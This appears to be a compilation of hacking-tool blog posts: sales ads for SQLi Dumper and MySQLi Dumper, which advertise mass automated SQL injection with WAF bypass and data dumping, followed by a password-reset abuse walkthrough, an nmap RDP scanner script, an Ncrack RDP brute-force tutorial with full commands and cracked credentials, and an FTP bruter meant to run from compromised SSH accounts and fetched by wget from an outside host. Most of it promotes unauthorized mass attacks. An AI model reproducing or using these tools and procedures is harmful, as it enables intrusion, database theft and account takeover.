6 SQLi Dumper v.5.0

SQLi Dumper - Advanced SQL Injection\Scanner Tool

Designed to be automated to find and exploit

 web security vulnerabilities in mass.It is robust,

 works in the background threads and is super faster.
Uses an advanced search engine with seven

 different online search services

(Google, Yandex, Bing, Yahoo, Sapo, Altavista and Terravista).

SQLi Dumper Features:

 -Suports Multi. Online search engine (to find the trajects);
 -Automated exploiting and analizing from a URL list;
 -Automated search for data in a bulk URL list;
 -Automated analizer for injections points using 

URL, POST, Cookies, UserLogin or UserPassword;
 -Dumper suports dumping data with multi-threading 

(databases/tables/columns/fetching data);
 -Exploiter suports up to 100x threads;
 -Analizer and Dumper suports up to 50x threads;
 -Advanced WAF bypass methods; 
 -Advanced custom query box; 
 -Dumper can dump large amounts of data, with greats 

control of delay each request (multi-threading);
 -Easy switch vulnerabilities to vulnerabilities;
 -Suports proxies list;
 -GeoIP database;
 -Internal database;
 -Trash System;
 -Admin login finder;
 -Hash online cracker;
 -Reverse IP;
 -Standalone .exe (no install).

SQL Injection Methods suported: 

- MySQL
 - Union (Integer / String)
 - Error (Integer / String)
 ** Error Methods:
  - Double Query
  - XPATH - ExtractValue
  - XPATH - UpdateXML
 - Brute Forcing
 - Blind
 - Load File
 - Load File Scanner
 ** Illegal Mix Of Collations:
  - UnHexHex()
  - Binary()
  - Cast As Char
  - Compress(Uncompress())
  - Convert Using utf8
  - Convert Using latin1
  - Aes_decrypt(aes_encrypt())
- MS SQL
 - Union (Integer / String)
 - Error (Integer / String)
 ** Illegal Mix Of Collations:
  - SQL_Latin1;
  - Cast As Char.
- Oracle
 - Union (Integer / String)
 - Error (Integer / String)
 ** Error Methods:
  - GET_HOST_ADDRESS
  - DRITHSX.SN
  - GET;APPINGXPATH.
 ** Illegal Mix Of Collations:
  - Cast As Char.
 ** Suports TOP N Types: 
  - ROWUM
  - RANK()
  - DESE_RANK()

** Analizer detects also:
 - MS Access
 - PostgredSQL
 - Sybase

** For using this tool you should know a little

 about SQL Injections.

Demo Version Limitations:

 - Max. URL per Search 500
 - Get links by ReverseIP DISABLED
 - Max. Trash 5000 URLs
 - SQL Injection Obfuscate - Bypass Functions and 

Keywords Filtering DISABLED
 - Exploiter Max. Threads 20
 - Analizer Max. Threads 3
 - Running multiples instancies DESABLED
 - Running multiples mini dump instancies DESABLED
 - Dumping Rows with multi-threading DESABLED
 - Network Credential DISABLED
 - Injection Methods for POST, Cookies, etc.. DESABLED
 - Proxy DISABLED
 - ReverseIP DISABLED
 - Load_File() scanner DISABLED

 ** Download: http://www.mediafire.com/?vfb8fps2beppsib
 ** Dependencies: Microsoft .NET Framework 4.x
  http://www.microsoft.com/en-us/download/details.aspx?id=17851
 

Price and Payment Method:
 - Binary (EXE): 150 USD / 115€ Euro
 - Source Code (VB.NET 2010): 2.000 USD / 1.550€ Euro
 ** Liberty Reserve

Contacts:

 - mysqlidumper [at] gmail [dot] com (email)
 - c4rl0s@jabber.org (IM Chat)

More Screen Shots:

http://imageshack.us/a/img40/9792/54476110.png
http://imageshack.us/a/img26/7343/43570486.png
http://imageshack.us/a/img833/1754/29794037.png
http://imageshack.us/a/img838/5985/62974282.png
http://imageshack.us/a/img405/2636/41411581.png
http://imageshack.us/a/img253/7108/87770469.png
http://imageshack.us/a/img845/5708/27459044.png
http://imageshack.us/a/img253/4696/23767618.png
http://imageshack.us/a/img338/4593/86695223.png
http://imageshack.us/a/img689/1859/84670334.png
http://imageshack.us/a/img692/4218/79948522v.png
http://imageshack.us/a/img571/690/48570647.png
http://imageshack.us/a/img27/8163/19180735.png
http://imageshack.us/a/img823/6977/14995786.png
http://imageshack.us/a/img443/4640/60463828.png
http://imageshack.us/a/img841/9392/43723692.png
http://imageshack.us/a/img20/8374/86406807.png
http://imageshack.us/a/img221/7549/38372480.png
http://imageshack.us/a/img16/1558/76135157.png
http://imageshack.us/a/img411/1913/97064053.png
http://imageshack.us/a/img208/1747/83970473.png
http://imageshack.us/a/img840/6143/78458462.png
http://imageshack.us/a/img268/5611/96006062.png
http://imageshack.us/a/img253/3442/47787419.png
http://imageshack.us/a/img849/4741/14173095.png
http://imageshack.us/a/img191/1821/61869828.png  

1 MySQLi Dumper | SQLi Injection Tool

MySQLi Dumper is an advanced automated SQL Injection tool dedicated to SQL injection attacks on MySQL and MS SQL.
It is designed to be automated to find and exploit web security vulnerabilities in mass.
It Is robust, works in the background threads and is super faster.

The power of MySQLi Dumper that makes it different from similar tools:

1. -Suports Multi. Online search engine (to find the trajects);
2. -Automated exploiting and analizing from a URL list, with a greats success rate;
3. -Automated search for columns names from a URL list (search for columns name 'where like %value%', useful to find eg. mails);
4. -Dumper suport dumping data with multi-threading (databases/tables/columns/fetching data);
5. -Dumper can dump large data, with greats control of delay per request (multi-threading);
6. -Easy switch vulnerabilities to vulnerabilities;
7. -You can see everthing that is load by HTTP request (HTTP Debbuger)

Some features:

1. -Online mult. search engine;
2. -Suport MySQL Union, MySQL Error, MS SQL Union, MS SQL Error Integer/String;
3. -Automated Exploiting;
4. -Automated Analizing;
5. -Trash System (you never exploit the same URL);
6. -Database to collect all vulnerabilities (with option to search for data in mass);
7. -Customized exploiter and analizer;
8. -GeoIP database;
9. -Small browser you can use to Union Count, view source code and HTTP headers;
10. -Back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running custom SQL statements, suport save/load sessions to XML file;
11. -Bruter forcing for MySQL <= 4.x
12. -File dumper for MySQL;
13. -File dumper Scanner for MySQL;
14. -Blind dumper for MySQL;
15. -WAF bypass method;
16. -Suport single proxy or proxies list (random/by order).
17. -Hash online crack;
18. -Admin login finder;
19. -Multi-Threading;
20. -User friendly GUI;

Sreen Shots

For using this tool you should know a little about SQL Injections.
Price 60€ / 74 USD Full version.
Full source code 1000€ / 1227 USD
Accepted payments
- libertyreserve.com
- moneybookers.com (trusted users)
- paypal.com (maybe..)
Dependencies: .NET Framework v.4
Demo Version available (older version only)!
Download: http://www.mediafire.com/?wberio939vwh1ez
Demo Limitations

Max. URL per Search 500
Get links by ReverseIP DISABLED
Max. Trash 5000 URLs
SQL Injection Obfuscate - Bypass Functions and Keywords Filtering DISABLED
Exploiter Max. Threads 20
Analizer Max. Threads 3
Network Credential DISABLED
Proxy DISABLED
ReverseIP DISABLED
Blinder are disabled in DEMO EDITION, you can check the Version() only for a demo :)
Load_File() scanner DISABLED

if you bought the v. 4.x
Email me for free update!
Contact: mysqlidumper [ at ] gmail [ dot ] com

0 Abusing Password Resets

This posts focuses on analyzing entropy and inline password resets, two major problems with forgot/reset password functionality. To do this, we have to automate both requesting a forgot password hundreds of times and parsing thru all of the e-mails we receive. Thanks to the recently added macro support now available in Burp (thanks PortSwigger), less effort is required on our part when an application employs anti-automation features to prevent such attempts.

For those not familiar with BurpSuite's Macro support, lets walk thru this.

So here is a picture of the email reset we've been sent:

To initiate a password reset request it is a four part request & response pair sequence. This sequence is saved in our proxy history. We need to navigate to Options > Sessions > Macros > New and highlight the four messages saved in the proxy history to create and configure the new macro.

Take a look at the screenshot below:

Okay now we need to configure each individual request/response to extract data we want. We have to grab a JSESSIONID and a struts token. Lets highlight the first request/response and configure.

Example of configuring one of the items

You'll notice that for the first request I've chosen to not use cookies in the cookie jar. This is because I want to start the sequence clean and without a cookie.

Notice the struts.token.name and struts.token are dynamic and changing so we derive these from the response. The rest are preset values like email and birthdate (no, not my real birthdate). One thing that is important to notice is that I've decided to uncheck URL encode for the email portion. It is already URL encoded so no need. Otherwise it will cause problems.

Name the Macro 

The next piece requires you to add the macro to a session rule. Again Options > Sessions > Session Handling > New. Highlight the macro you'd like to use.

Next, you'll need to add the pages to scope:

Now send the original, first request (I do this at the proxy history portion of Burp) over to intruder, select null payloads and set it for a number that is large enough to collect a big portion of passwords so we can review entropy. You'll see below that Intruder is configured to send the password reset sequence 800 times. Again, this will initiate the macro each time, so you are essentially resetting the password 800 times.

Next we need to retrieve the emails from gmail and review them for entropy. Here is a script I've written to retrieve emails from gmail, parse for the password values and write to a file called tokens.txt:

Lines 11-17:

Line 12: File we will place all of our emails in (make sure you create an inbox folder)
Line 13: Initialize Pop class
Line 14: Enable SSL
Line 15: Replace with your username and password
Line 16: Call the check_for_emails method with the pop obj

Lines 20-27:

Line 21-22: If we no emails, print that fact out to the screen
Line 24-25: We have emails, print that fact to the screen and call place_emails_into_file method with the pop object.

Lines 31-36:

Line 31: Iterate thru pop array
Line 32: Open the file (line 12)
Line 33: Write the messages to the file
Line 36: Call the create_file_with_tokens method

Lines 40-53:

Line 41: Create a new_file object which is a file called tokens.txt
Line 42: Create a read_file object which reads the inbox/emails.txt file from Line 12
Line 43: Begin reading each line from the read_file
Lines 44-46: If the line matches the "password: somepassword" write it to a file.
Line 53: Kick the whole thing off

Review the tokens.txt file

We can see that the new passwords sent aren't very random. We can load this in burp sequencer but there really isn't any point when it is this easy. It is obvious that the developer has two separate arrays of words and and another array of numbers. They pick "randomly" from that pile and concatenate the values. Here is the actual line of code I wrote to do this and yes this is a real-life example that I've come across:

Factors that could slow us down:

1) If we can't enumerate e-mail addresses somehow. An example of enumeration would be if you type in a username/e-mail address and and the site tells you it doesn't exist. Now we know who DOES exist on the system.

2) This particular site requires a birthdate along with the email address. This is difficult but not impossible. If we know the e-mail address exists it is a matter of guessing the birthdate (automate w/ Intruder).

3) After we've reset other user's passwords, we need to guess the password (made MUCH easier by reviewing the entropy). If an account lock-out policy is enforced (after a small amount of incorrect password submissions) the account may be locked out leaving us without access. That is no fun.

Even if the reset or forgotten password function doesn't send us a clear-text password it may send us a reset link. It is important to review the randomness of that link.

Here is an example of loading the tokens file in sequencer:

Summary:

We've bypassed struts token and multi-flow password resets which might have been intended to slow us down. We've collected all of our emails and parsed them for passwords/tokens/links. We've manually (in this case) reviewed the entropy but we can also do this with sequencer. Now we have a way to guess passwords more efficiently and in combination with other flaws leaves us just a short period of time from compromising accounts.

All credits for this post goes to carnal0wnage

0 rdpScan Network Checker

This is a simple script that leverages nmap to scan for RDP-Server.

#!/bin/bash
#
# rdpScan - scan a network segment for RDP-Server          
# author: silverstoneblue@gmx.net 
# requires:  fgrep awk nmap

scriptname="rdpScan"
version="1.0"
rdpips="/tmp/tmprdp.$$"

declare -i rdpfound=0

function is_installed {
  which $1 > /dev/null 2>&1
  if [ $? -ne 0 ]
  then
    printf "\nERROR: %s not installed.\n\n" $1
    exit 255
  fi
}
 
is_installed fgrep
is_installed awk
is_installed nmap

 if [ $# -ne 1 ]; then
    printf "\n \n"
   printf "rdpScan - scan a network segment for RDP-Server \n\n"
    printf "version %s by silverstoneblue@gmx.net \n\n" $version
   printf "Usage: %s {target network}\n\n" $scriptname
    printf "target network:\n"
    printf "  can pass hostnames, IP's, networks, etc.\n"
    printf "  server.company.com, company.com/24, 192.168.0.1/16, 10.0.0-255.1-254\n"
    printf "example:\n"
    printf "  %s 80.187.0.0/24\n\n" $scriptname
    exit 255
 fi
 
iprange=$1
 
printf "\nScanning for RDP-Server..."
 
nmap -n -P0 -sS -p 3389 -oG - $iprange | fgrep 'Ports: 3389/open/tcp//ms-term-serv///' | awk '{print $2}' > $rdpips

printf "\n\n"

exec 3< $rdpips
 
echo "*****************"
echo "RDP IP Address"
echo "*****************"
 
 while read rdpip <&3 ; do
    rdpfound=$rdpfound+1
    printf "%-15s %s\n" $rdpip 
 done

 
 if [ $rdpfound -eq 0 ] ; then 
  printf "No RDP-Server found on network target %s. \n\n" $iprange
   rm -f $rdpips 
  exit 255
 fi
 
printf "\n%d RDP-Server found on network target %s.\n" $rdpfound $iprange
printf "Now try ur luck ;)\n"
printf "have fun ;) \n"
rm -f $rdpips 
exit 0

Download

0 RDP Scanning & Cracking

DISCLAIMER
All information provided are for educational purposes only. It is not an endorsement to undertake hacking activity in any form (unless such activity is authorized). Tools and techniques demonstrated may be potential damaging if used inappropriately. All characters and data written on this post are fictitious.

The Remote Desktop Protocol is often underestimated as a possible way to break into a system during a penetration test. Other services, such SSH and VNC are more likely to be targeted and exploited using a remote brute-force password guessing attack. For example, let’s suppose that we are in the middle of a penetration testing session at the “MEGACORP” offices and we already tried all the available remote attacks with no luck. We tried also to ARP poisoning the LAN looking to get user names and passwords, without succeeding. From a previus nmap scan log we found a few Windows machines with the RDP port open and we decided to investigate further this possibility. First of all we need some valid usernames in order to guess only the passwords rather than both. We found the names of the IT guys on varius social networking websites. Those are the key IT staff:

jessie tagle
julio feagins
hugh duchene
darmella martis
lakisha mcquain
ted restrepo
kelly missildine
Didn’t take long to create valid usernames following the common standard of using the first letter of the name and the entire surname.
jtagle
jfeagins
hduchene
dmartis
lmcquain
trestrepo
kmissildine
Software required:
Linux machine, preferably Ubuntu.
nmap and terminal server client, sudo apt-get install tsclient nmap  build-essential checkinstall libssl-dev libssh-dev
About Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack’s features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap’s and many more. Protocols supported include RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet .http://nmap.org/ncrack/

Installation
wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
mkdir /usr/local/share/ncrack
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
./configure
make
checkinstall
dpkg -i ncrack_0.4ALPHA-1_i386.deb
Information gathering

Let’s find out what hosts in a network are up, and save them to a text list. The  regular expression will parse and extract only the ip addresses from the scan.

Nmap ping scan, go no further than determining if host is online

nmap  -sP 192.168.56.0/24 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > 192.168.56.0.txt

Nmap fast scan with input from list of hosts/networks
nmap -F -iL 192.168.56.0.txt

Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-10 13:15 CEST

Nmap scan report for 192.168.56.10

Host is up (0.0017s latency).

Not shown: 91 closed ports

PORT     STATE SERVICE

88/tcp   open  kerberos-sec

135/tcp  open  msrpc

139/tcp  open  netbios-ssn

389/tcp  open  ldap

445/tcp  open  microsoft-ds

1025/tcp open  NFS-or-IIS

1026/tcp open  LSA-or-nterm

1028/tcp open  unknown

3389/tcp open  ms-term-serv

MAC Address: 08:00:27:09:F5:22 (Cadmus Computer Systems)

Nmap scan report for 192.168.56.101

Host is up (0.014s latency).

Not shown: 96 closed ports

PORT     STATE SERVICE

135/tcp  open  msrpc

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

3389/tcp open  ms-term-serv

MAC Address: 08:00:27:C1:5D:4E (Cadmus Computer Systems)

Nmap done: 55 IP addresses (55 hosts up) scanned in 98.41 seconds

From the log we can see two machines with the microsoft terminal service port (3389) open, looking more in depth to the services available on the machine 192.168.56.10 we can assume that this machine might be the domain controller, and it’s worth trying
to pwn it.

At this point we need to create a file (my.usr) with the probable usernames previously gathered.
vim my.usr
jtagle
jfeagins
hduchene
trestrepo
kmissildine
We need also a file (my.pwd) for the password, you can look on the internet for common passwords and wordlists.
vim my.pwd
somepassword
passw0rd
blahblah
12345678
iloveyou
trustno1
At this point we run Ncrack against the 192.168.56.10 machine.

ncrack -vv  -U my.usr -P my.pwd 192.168.56.10:3389,CL=1

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST

Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd'

rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.

Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah'

rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.

Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678'

rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.

Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou'

rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.

Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1'

rdp://192.168.56.10:3389 finished.

Discovered credentials for rdp on 192.168.56.10 3389/tcp:

192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd'

192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah'

192.168.56.10 3389/tcp rdp: 'jtagle' '12345678'

192.168.56.10 3389/tcp rdp: 'kmissildine' 'iloveyou'

192.168.56.10 3389/tcp rdp: 'trestrepo' 'trustno1'

Ncrack done: 1 service scanned in 98.00 seconds.

Probes sent: 51 | timed-out: 0 | prematurely-closed: 0

Ncrack finished.

We can see from the Ncrack results that all the user names gathered are valid, and also we were able to crack the login credential since they were using some weak passwords. Four of the IT staff have some kind of restrictions on the machine, except hduchene that might be the domain administrator, let’s find out.

Run the terminal server client from the Linux box

tsclient 192.168.56.10 use Hugh Duchene credential ‘hduchene’ ‘passw0rd’ and BINGO !!!

At this point we have the control of the entire MEGACORP domain, unlimited access to all the corporate resources related to the domain. We can add users, escalate privileges of existing users, browse over the protected network resources, install backdoors and root-kits, and more and more.

Enjoy ,,

0 DFF Scanner

- find files and folders on server
- customized search
- included on BackTrack 4




An web administrator File / Folder Scanner 

DFF Scanner
(download)

0 Webshag

Webshag is a multi-threaded, multi-platform web server audit tool. Written in Python, it gathers commonly useful functionalities for web server auditing like website crawling, URL scanning or file fuzzing.
Webshag can be used to scan a web server in HTTP or HTTPS, through a proxy and using HTTP authentication (Basic and Digest). In addition to that it proposes innovative IDS evasion functionalities aimed at making correlation between request more complicated (e.g. use a different random per request HTTP proxy server).


It also provides innovative functionalities like the capability of retrieving the list of domain names hosted on a target machine and file fuzzing using dynamically generated filenames (in addition to common list-based fuzzing).

Webshag URL scanner and file fuzzer are aimed at reducing the number of false positives and thus producing cleaner result sets. For this purpose, webshag implements a web page fingerprinting mechanism resistant to content changes. This fingerprinting mechanism is then used in a false positive removal algorithm specially aimed at dealing with "soft 404" server responses.
Webshag provides a full featured and intuitive graphical user interface as well as a text-based command line interface and is available for Linux and Windows platforms

Requirements

To be fully functional, webshag requires the following elements:

• Python 2.5/2.6 (NOT compatible with Python 3.0)
• wxPython 2.8.9.0 or greater GUI toolkit
• Nmap port scanner (for port scanning module only)
• A valid Live Search AppID (for domain information module only)

Note: to use installer on Windows Vista, please refer to user manual.

Downloads

version 1.10
Linux (tarball)	ws110.tar.gz
Windows (ZIP archive)	ws110.zip
Windows (installer)	ws110_win32installer.zip
User manual (EN)	ws110_manual.pdf

0 Fireforce

Fireforce is a Firefox extension designed to perform brute-force attacks on GET and POST forms.
Fireforce can use dictionaries or generate passwords based on several character types.

Fireforce can be used on any platform running the Firefox web browser

Download Firefox Addon

0 Mini MySqlat0r

Mini MySqlat0r is a multi-platform application used to audit web sites in order to discover and exploit SQL injection vulnerabilities. It is written in Java and is used through a user-friendly GUI that contains three distinct modules.

The Crawler modules allows the user to view the web site structure and gather all tamperable parameters. These parameters are then sent to the Tester module that tests all parameters for SQL injection vulnerabilities. If any are found, they are then sent to the Exploiter module that can exploit the injections to gather data from the database.

Mini MySqlat0r can be used on any platform running the Java

Download Tool

Download Manual

0 ev1lut10n local ftp bruter version 1.0

Hi there .. an another qulaity tool by my friend ev1lut10n. for bruteforcing FTP logins via ssh servers . u can use any ssh that u can get from ur scanning for try to crack FTP's .. Tool work on localhost

 

Download : http://jayakonstruksi.com/backupintsec/ev1cpanel_finder.tgz

suggested run on ssh acc that u have taken over

==========
ev1lut10n@ev1l:~$ wget jayakonstruksi.com/backupintsec/ev1cpanel_finder.tgz
--2011-08-31 16:55:31-- http://jayakonstruks.../e...finder.tgz
Resolving jayakonstruksi.com... 202.155.61.121
Connecting to jayakonstruksi.com|202.155.61.121|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2638 (2.6K) [application/x-tar]
Saving to: `ev1cpanel_finder.tgz'

100%[===================================================================================================================>] 2,638 --.-K/s in 0.01s

2011-08-31 16:55:31 (204 KB/s) - `ev1cpanel_finder.tgz' saved [2638/2638]

ev1lut10n@ev1l:~$ tar zxvf ev1cpanel_finder.tgz
ev1cpanel_finder/
ev1cpanel_finder/ftp_credentials.txt
ev1cpanel_finder/ev1cp.pl
ev1cpanel_finder/invalid_user_lists.txt
ev1cpanel_finder/password.txt
ev1lut10n@ev1l:~$ cd ev1cpanel_finder
ev1lut10n@ev1l:~/ev1cpanel_finder$ perl ev1cp.pl

============


than just wait for some hours ;-p


=========
ev1lut10n@ev1l:~/ev1cpanel_finder$ perl ev1cp.pl

_____
___ _ _< / /
/ -_) |/ / / /
__/|___/_/_/ uti0n Cpanel Finder


H3llc0me to ev1lut10n Cpanel Finder version 1.0


checking whether 21 is open or not at :
ev1lut10n@ev1l:~/ev1cpanel_finder$
Start ftp dict attack at 127.0.0.1 for username:bojing

Start ftp dict attack at 127.0.0.1 for username:ev1lut10n

testing bojing and bojing at 127.0.0.1

Start ftp dict attack at 127.0.0.1 for username:kacung

snippped-----------

_____
___ _ _< / /
/ -_) |/ / / /
__/|___/_/_/ uti0n Cpanel Finder


H3llc0me to ev1lut10n Cpanel Finder version 1.0


Finished ! please check ftp_credentials.txt, if null means fail epic !
ev1lut10n@ev1l:~/ev1cpanel_finder$ cat ftp_credentials.txt
null

[+] w00t kacung : 123 found !!!


[+] w00t bojing : 12345 found !!!

==========

on success u got some weak password on that box